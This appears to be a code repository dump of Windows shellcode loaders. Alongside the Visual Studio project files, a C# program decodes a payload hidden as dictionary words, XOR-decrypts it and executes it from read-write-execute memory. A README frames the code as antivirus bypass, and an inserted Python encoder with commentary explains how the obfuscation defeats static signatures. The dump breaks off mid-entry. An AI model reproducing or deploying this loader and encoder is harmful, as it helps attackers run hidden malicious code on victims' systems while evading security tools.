    "content": "// Microsoft Visual C++ generated resource script.\r\n//\r\n\r\n#include \"resource.h\"\r\n\r\n#define APSTUDIO_READONLY_SYMBOLS\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// Generated from the TEXTINCLUDE 2 resource.\r\n//\r\n#include \"winres.h\"\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n#undef APSTUDIO_READONLY_SYMBOLS\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n// Chinese (Simplified, PRC) resources\r\n\r\n#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)\r\nLANGUAGE 4, 2\r\n\r\n#ifdef APSTUDIO_INVOKED\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// TEXTINCLUDE\r\n//\r\n\r\n1 TEXTINCLUDE\r\nBEGIN\r\n    \"resource.h\\0\"\r\nEND\r\n\r\n2 TEXTINCLUDE  \r\nBEGIN\r\n    \"#include \"\"winres.h\"\"\\r\\n\"\r\n    \"\\0\"\r\nEND\r\n\r\n3 TEXTINCLUDE  \r\nBEGIN\r\n    \"\\r\\n\"\r\n    \"\\0\"\r\nEND\r\n\r\n#endif    // APSTUDIO_INVOKED\r\n\r\n#endif    // Chinese (Simplified, PRC) resources\r\n/////////////////////////////////////////////////////////////////////////////\r\n\r\n\r\n\r\n#ifndef APSTUDIO_INVOKED\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// Generated from the TEXTINCLUDE 3 resource.\r\n//\r\n\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n#endif    // not APSTUDIO_INVOKED\r\n"
  },
  {
    "path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup Label=\"ProjectConfigurations\">\r\n    <ProjectConfiguration Include=\"Debug|Win32\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|Win32\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Debug|x64\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|x64\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n  </ItemGroup>\r\n  <PropertyGroup Label=\"Globals\">\r\n    <VCProjectVersion>16.0</VCProjectVersion>\r\n    <Keyword>Win32Proj</Keyword>\r\n    <ProjectGuid>{77df2be0-aec7-47ad-b5f8-114f3eb54e91}</ProjectGuid>\r\n    <RootNamespace>shellcodeexecute</RootNamespace>\r\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    
<CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>MultiByte</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>MultiByte</CharacterSet>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\r\n  <ImportGroup Label=\"ExtensionSettings\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"Shared\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" 
Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <PropertyGroup Label=\"UserMacros\" />\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\r\n    
</ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n      <BufferSecurityCheck>false</BufferSecurityCheck>\r\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"shellcode_execute.cpp\" />\r\n  </ItemGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\r\n  <ImportGroup Label=\"ExtensionTargets\">\r\n  </ImportGroup>\r\n</Project>"
  },
  {
    "path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup>\r\n    <Filter Include=\"源文件\">\r\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\r\n      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"头文件\">\r\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\r\n      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"资源文件\">\r\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\r\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\r\n    </Filter>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"shellcode_execute.cpp\">\r\n      <Filter>源文件</Filter>\r\n    </ClCompile>\r\n  </ItemGroup>\r\n</Project>"
  },
  {
    "path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\r\n  </PropertyGroup>\r\n</Project>"
  },
  {
    "path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute.sln",
    "content": "﻿\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.2.32519.379\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"shellcode_execute\", \"shellcode_execute\\shellcode_execute.vcxproj\", \"{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}.Release|x64.Build.0 = Release|x64\r\n\t\t{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {1281A27F-E3AA-4335-BC13-1310F2CB94CC}\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  },
  {
    "path": "demo2/README.md",
    "content": "Uses string encryption, XOR encryption and sandbox-evasion checks to bypass AV.\r\n\r\ndemo2 runs the shellcode by creating a new thread with CreateThread, which is very easily intercepted; the revised version, demo3, loads the shellcode with EtwpCreateEtwThread instead.\r\n"
  },
  {
    "path": "demo2/shellcode_execut3/shellcode_execut3/App.config",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\" ?>\r\n<configuration>\r\n    <startup> \r\n        <supportedRuntime version=\"v4.0\" sku=\".NETFramework,Version=v4.7.2\" />\r\n    </startup>\r\n</configuration>"
  },
  {
    "path": "demo2/shellcode_execut3/shellcode_execut3/Program.cs",
    "content": "﻿using System;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;\r\n\r\nusing System;\r\nusing System.IO;\r\nusing System.Collections.Generic;\r\nusing System.Text;\r\nusing System.Threading.Tasks;\r\nusing System.Security.Cryptography;\r\nusing System.Runtime.InteropServices;\r\n\r\nnamespace RunShellCode\r\n{\r\n    static class Program\r\n    {\r\n        private static T[] SubArray<T>(this T[] data, int index, int length)\r\n        {\r\n            T[] result = new T[length];\r\n            Array.Copy(data, index, result, 0, length);\r\n            return result;\r\n        }\r\n\r\n        private static byte[] xor(byte[] cipher, byte[] key)\r\n        {\r\n            byte[] decrypted = new byte[cipher.Length];\r\n\r\n            for (int i = 0; i < cipher.Length; i++)\r\n            {\r\n                decrypted[i] = (byte)(cipher[i] ^ key[i % key.Length]);\r\n            }\r\n\r\n            return decrypted;\r\n        }\r\n\r\n\r\n        static void Main()\r\n        {\r\n            \r\n            string p = \"puffs knives definitions offering principal peg footing thermals berths observer knives catch publication berths drive spots strings knives truths anticipation resolution occurrence cuff berths shed knives odors yaws company occurrence cuff berths polish knives odors harbor centimeter occurrence buzzes spans sets noises prefix change guess occurrence lifetimes resident differences change glances updates reliabilities specialties formation scenes cabinet facilities drive addresses friday emergency hills apples thermals airfield welds sod honor alkalinity formation bypasses conversions change airfield accumulations communications monolith telecommunication commanders occurrence friday friday similarity similarity spare twist anticipation berths observer drydocks sod certifications lamps adherence default hardcopies others experiences scope honor occurrence seeds 
shortages rate sponges thermocouples prefix friday surges bails others hardcopies expiration grids addresses honor ounce spare eighths drive twist prefix change guess occurrence lifetimes resident differences airfield ornaments cabinet alkalinity mules thermals point subtotal spans entrances entry vent expenditures science scratch entries sod default bypasses harbor swamps armory shortages rate sponges chimney prefix friday surges default scenes rate accumulations airfield hazard honor restrictions noises properties drive deletions knives stalls armory cuff properties expenditures sum airfield reams addresses ohms friday count entries prefix welds knives animals publication count properties feeders offering pools knives yaws auditor bails armory scenes catch centimeter airfield stalls slice merchant gyros wave principal expiration animals lifetimes subordinates settings halves pools speeders defeats share analyses resolution prefixes expenditures scenes strings hazard military boy vent bypasses researcher scenes airfields addresses answers information entries jail stones eighths mirrors facilities airfield change ditto slice lifetimes resident knives programmers grids addresses centimeter mules spots scenes airfields sprayer yaws telephone pen jail stones merchant formation centimeter airfield result defections mules stage alkalinity berths observer drydocks sponges artillery rebounds copy spots prefix reams analyses armory publication drive copy recruits ohms clock point defections auditor military peg armory balances knives military nylon chemicals evaluations result properties desert ditto prefix change guess alkalinity radios thermals alkalinity sponges swamps yaws welds mules vacuum merchant homes cash messenger alarms anticipation occurrence anticipation apprehensions hardcopies stones shipments scope share yaws drydocks eighths desert presence airfield result deletions settings apprehensions resident principal expiration glow alarms conversions evaluations 
stresses berths thermals airfield book pools accumulations hardcopies chimney wave deletions surges facilities professionals certifications ornaments thermals thermals berths knives glow circumstances berths programs communications expenditures berths observer nozzle spare executions gleam thermals thermals berths halves jeopardy alarms auditor jail specialties eighths speeders thermals catch entries thermocouples boy grids gleam eighths programmers shed stage sleep messenger deductions deletions glow vent count shaft acronyms occurrence sum noises telecommunications harbor prefixes ohms pails friday hazard congress circulation answers apples change state deductions addresses stresses defeats radios knob sprayer balances presence principal prefixes executions jail noises restrictions professionals telecommunications pools grids equivalents deviation deletions cavity feeders emergency occurrence shed meters commanders equivalents equivalents reliabilities speeders thermocouples radios strip knives deductions reams chimney suggestions outfit defect share nose defect addresses pull default truths knob fares pools prefix acronyms technician change sprayer artillery evaluations commanders subtotal knob sprayer telecommunications answers mirrors inspection pull specialties speeders answers change mirrors artillery share artillery thermocouples sponges buzzes settings shortages loans subtotal cash hoofs chock builders professionals fares hoofs ounce resolution answers answers builders chief professionals loans default cash truths chock builders others defect radios ounce shed lifetimes specialties polish ounce similarity lifetimes radios pools sponges analyses speeders sprayer spots chock updates glances defeat change knob welds catch thermals harbor eliminator boy auditor homes gyros gyroscope stones programmers principal adherence fans drive subordinates participation cash stones strings defect entries eliminator nozzle harness photograph drive telecommunications twist 
centimeter surplus result book subtotal resident slopes professionals spokes navy recruits participation noises share voices thermocouples alkalinity addresses boy glances apprehensions share congress scope entries definitions shortages damages intervals differences sleep gyros balances ditto vent routine builders technician hardcopies slice entries slice meters feeders stalls guess researcher meters tents scope speeders change pull gleam crusts adhesives subordinates hardcopies magazine auxiliaries offering balances circulation chock photograph military resolution scratch labors knives conversions rate resolution sets bails addresses slopes eighths cavity fares updates hardcopies shaft routine company puffs defeat eighths polish inspection technician odors animals slopes subordinates labors participation expiration point communications shaft anticipation artillery outfit congress round hills buzzes voices spans programmers swamps shaft hardcopies speeders congress shipments resident chock crusts footing shortage budget radios jeopardy occurrence puffs defeats sum alarms gyroscope budget clock scenes fares merchant sets halves conversions comment reams wave centimeter surges transmitter thermocouples book ounce eighths presence certifications sets comment airfields navy race communications strings observer ticket seeds properties budget cabinet mules centimeter twist specialties fares surplus settings centimeter settings cabinet mirrors ways meters twist lifetimes voices carpet stage auditor cathode hardcopies shipments suggestions copy offering auditor bails jeopardy participation auditor military properties fasteners nylon apples drydocks entries noises suggestions copy carpet berths adhesives drydocks entries publication vacuum scenes thermals berths observer knives sessions ohms presence berths shaft principal sum airfield footing buzzes spots properties spare nozzle knives military entry chemicals bypasses desert scenes peg observer thermocouples entries 
subordinates settings anticipation weeks prefix apples chief student stones sessions differences odors hardcopies stones cathode chimney certifications lamps adherence sleep analyses slopes armory sod friday point plating resident technician telecommunication reams suggestions ohms occurrence strings thermals berths observer drydocks scope facilities peg facilities jail principal expiration truths mirrors truths alloy lifetimes ounce subtotal cash hoofs knob artillery fasteners lifetimes thermals animals drydocks ammonia share\";\r\n            string s = \"evaluations shed fasteners lifetimes share ounce acronyms analyses speeders pull defeats resolution glances inspection strip telephone telecommunications formation loans technician updates nose scratch entrances crusts answers harbor similarity specialties alloy prefix sod vent conversions sponges airfield chemicals circulation addresses hardcopies seeds sets knives hazard noises publication animals suggestions expenditures thermals homes reams ohms strings catch scope balances yaws welds buzzes centimeter participation defect polish defeat pools prefixes adherence knob routine chimney cash commanders thermocouples builders information mirrors chock fans default programmers messenger monolith change subtotal radios fares truths hoofs sprayer artillery drive berths spots alkalinity observer others professionals outfit accumulations entries armory count reliabilities drydocks subordinates friday mules restrictions scenes copy adhesives company shortages settings occurrence properties eighths slice gyros science chief state spans sleep nozzle executions vacuum recruits stage carpet halves offering round boy auditor glow comment gyroscope presence alarms pails entry voices expiration deductions puffs principal cabinet meters equivalents grids surplus circumstances guess nylon cathode intervals ornaments facilities shipments defections feeders sum twist telecommunication deletions programs auxiliaries plating 
bypasses cuff spare anticipation ditto experiences communications labors race ways transmitter researcher magazine deviation pen weeks wave differences jail jeopardy hills bails ammonia sessions photograph gleam shaft book merchant peg cavity airfields harness ticket apples result surges stalls eliminator military honor odors stones desert swamps rate certifications spokes clock definitions slopes emergency lamps point resident shortage apprehensions navy budget rebounds congress footing stresses tents damages student\";\r\n            char[] raw = { (char)0, (char)1, (char)2, (char)3, (char)4, (char)5, (char)6, (char)7, (char)8, (char)9, (char)10, (char)11, (char)12, (char)14, (char)15, (char)16, (char)17, (char)18, (char)19, (char)20, (char)21, (char)22, (char)23, (char)24, (char)25, (char)26, (char)27, (char)28, (char)29, (char)31, (char)32, (char)33, (char)34, (char)35, (char)36, (char)37, (char)38, (char)39, (char)40, (char)41, (char)42, (char)43, (char)44, (char)45, (char)46, (char)47, (char)48, (char)49, (char)50, (char)51, (char)52, (char)53, (char)54, (char)55, (char)56, (char)57, (char)58, (char)59, (char)60, (char)61, (char)62, (char)63, (char)64, (char)65, (char)67, (char)68, (char)69, (char)70, (char)71, (char)72, (char)73, (char)74, (char)75, (char)77, (char)78, (char)79, (char)80, (char)82, (char)83, (char)84, (char)85, (char)86, (char)87, (char)88, (char)89, (char)90, (char)91, (char)92, (char)93, (char)94, (char)95, (char)96, (char)97, (char)98, (char)99, (char)100, (char)101, (char)102, (char)103, (char)104, (char)105, (char)106, (char)107, (char)108, (char)109, (char)110, (char)111, (char)112, (char)113, (char)114, (char)115, (char)116, (char)118, (char)119, (char)120, (char)121, (char)122, (char)123, (char)124, (char)125, (char)126, (char)127, (char)130, (char)132, (char)133, (char)134, (char)135, (char)136, (char)137, (char)138, (char)139, (char)140, (char)141, (char)142, (char)143, (char)145, (char)146, (char)147, (char)148, (char)149, 
(char)150, (char)151, (char)152, (char)154, (char)155, (char)156, (char)157, (char)158, (char)160, (char)161, (char)162, (char)164, (char)165, (char)166, (char)167, (char)168, (char)169, (char)170, (char)172, (char)173, (char)174, (char)175, (char)176, (char)177, (char)178, (char)179, (char)180, (char)181, (char)182, (char)183, (char)184, (char)185, (char)186, (char)187, (char)188, (char)189, (char)190, (char)191, (char)192, (char)193, (char)194, (char)195, (char)197, (char)198, (char)201, (char)202, (char)204, (char)205, (char)206, (char)207, (char)208, (char)209, (char)210, (char)211, (char)212, (char)213, (char)214, (char)215, (char)216, (char)217, (char)218, (char)219, (char)220, (char)221, (char)222, (char)224, (char)225, (char)226, (char)227, (char)228, (char)229, (char)230, (char)231, (char)232, (char)233, (char)234, (char)235, (char)236, (char)237, (char)238, (char)239, (char)240, (char)241, (char)242, (char)243, (char)244, (char)245, (char)246, (char)247, (char)248, (char)249, (char)250, (char)251, (char)253, (char)254, (char)255 };\r\n            string[] sArray = s.Split(' ');\r\n            string[] pArray = p.Split(' ');\r\n\r\n\r\n            char[] ret_char = new char[pArray.Length];\r\n\r\n\r\n            int index = 0;\r\n            for (int i = 0; i < pArray.Length; ++i)\r\n            {\r\n                for (int j = 0; j < sArray.Length; ++j)\r\n                {\r\n                    if (pArray[i] == sArray[j])\r\n                    {\r\n                        ret_char[index] = raw[j];\r\n                        index++;\r\n                    }\r\n                }\r\n            }\r\n            byte[] encryptedShellcode = new byte[ret_char.Length];\r\n\r\n            for (int k = 0; k < ret_char.Length; k++) {\r\n\r\n                encryptedShellcode[k] = (byte)ret_char[k];\r\n\r\n            }\r\n\r\n\r\n\r\n            string key = \"admin123\";\r\n            byte[] shellcode = null;\r\n            shellcode = 
xor(encryptedShellcode, Encoding.ASCII.GetBytes(key));\r\n\r\n            // Pointer arguments are declared as IntPtr/UIntPtr so the P/Invoke signatures are\r\n            // correct for both x86 and x64 builds (UInt32 truncates 64-bit addresses and SIZE_T).\r\n            IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(uint)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n            if (funcAddr == IntPtr.Zero)\r\n            {\r\n                return;\r\n            }\r\n            Marshal.Copy(shellcode, 0, funcAddr, shellcode.Length);\r\n            IntPtr hThread = IntPtr.Zero;\r\n            UInt32 threadId = 0;\r\n            IntPtr pinfo = IntPtr.Zero;\r\n\r\n            // Invoke the shellcode\r\n            hThread = CreateThread(IntPtr.Zero, 0, funcAddr, pinfo, 0, ref threadId);\r\n            WaitForSingleObject(hThread, 0xFFFFFFFF);\r\n\r\n            return;\r\n        }\r\n\r\n        private static UInt32 MEM_COMMIT = 0x1000;\r\n        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\r\n\r\n        // The usual Win32 API trio functions: VirtualAlloc, CreateThread, WaitForSingleObject\r\n        [DllImport(\"kernel32\")]\r\n        private static extern IntPtr VirtualAlloc(\r\n            IntPtr lpAddress,\r\n            UIntPtr dwSize,\r\n            UInt32 flAllocationType,\r\n            UInt32 flProtect\r\n        );\r\n\r\n        [DllImport(\"kernel32\")]\r\n        private static extern IntPtr CreateThread(\r\n            IntPtr lpThreadAttributes,\r\n            UInt32 dwStackSize,\r\n            IntPtr lpStartAddress,\r\n            IntPtr lpParameter,\r\n            UInt32 dwCreationFlags,\r\n            ref UInt32 lpThreadId\r\n        );\r\n\r\n        [DllImport(\"kernel32\")]\r\n        private static extern UInt32 WaitForSingleObject(\r\n            IntPtr hHandle,\r\n            UInt32 dwMilliseconds\r\n        );\r\n    }\r\n}\r\n"
  },
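The encoder that produces demo2's `p`, `s` and `raw` literals is not part of the repo. As an added example (not the 78itsT3@m authors' code), the Python script below mirrors the scheme Program.cs decodes: repeating-key XOR with the key `admin123` from Program.cs, then one dictionary word per ciphertext byte, with a word table that, like demo2's `raw[]`, only covers byte values that actually occur. The syllable-based vocabulary and the sample payload are constructed here; demo2 uses real English words, but any distinct space-free tokens work. `to_csharp` emits the three literals in the shape Program.cs expects.

```python
"""
Encoder for the demo2 shellcode obfuscation scheme: repeating-key XOR, then each
byte value replaced by a dictionary word, so the payload is stored as two long
word strings (p, s) plus a byte table (raw). Added example, not code from the
78itsT3@m repo; the vocabulary and the sample payload are constructed.
"""
import random

# Constructed vocabulary: 16 x 16 syllable pairs give 256 distinct pseudo-words.
# demo2 uses real English words; the scheme only needs distinct, space-free tokens.
_SYL = ["ba", "co", "di", "fe", "ga", "hu", "ji", "ko",
        "la", "mo", "ne", "po", "ru", "se", "ti", "vu"]
WORDS = [a + b for a in _SYL for b in _SYL]


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, identical to the xor() helper in demo2's Program.cs."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode(shellcode: bytes, key: bytes, words=WORDS, seed: int = 0):
    """Return (p, s, raw).

    p   : one word per ciphertext byte, in payload order
    s   : the vocabulary actually used (one word per distinct byte value)
    raw : raw[j] is the byte value that s[j] stands for
    As in demo2's raw[] table, byte values that never occur get no word.
    """
    ct = xor_bytes(shellcode, key)
    values = sorted(set(ct))
    if len(values) > len(words):
        raise ValueError("need at least one word per distinct byte value")
    chosen = random.Random(seed).sample(words, len(values))
    word_for = dict(zip(values, chosen))
    p = " ".join(word_for[b] for b in ct)
    s = " ".join(chosen)
    return p, s, values


def decode(p: str, s: str, raw, key: bytes) -> bytes:
    """Inverse mapping, mirroring the nested word-lookup loop in Program.cs."""
    s_arr = s.split(" ")
    ct = bytearray()
    for word in p.split(" "):
        for j, cand in enumerate(s_arr):
            if word == cand:
                ct.append(raw[j])
    return xor_bytes(bytes(ct), key)


def to_csharp(p: str, s: str, raw) -> str:
    """Emit the p / s / raw literals in the form demo2's Program.cs uses."""
    raw_lit = ", ".join(f"(char){v}" for v in raw)
    return (f'string p = "{p}";\n'
            f'string s = "{s}";\n'
            f'char[] raw = {{ {raw_lit} }};')


if __name__ == "__main__":
    # Constructed stand-in for a payload; a real .bin would be read from disk.
    sample = bytes(range(0, 256, 3)) + b"\x90\x90\xcc"
    p, s, raw = encode(sample, b"admin123")
    assert decode(p, s, raw, b"admin123") == sample
    print(to_csharp(p, s, raw))
```

Because the word-to-byte table is chosen per payload and the key is applied before the substitution, two builds of the same shellcode share no literal strings, which is the static-signature property demo2 relies on; the XOR key itself still sits in the binary in clear, so this is obfuscation, not protection of the payload.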
  {
    "path": "demo2/shellcode_execut3/shellcode_execut3/Properties/AssemblyInfo.cs",
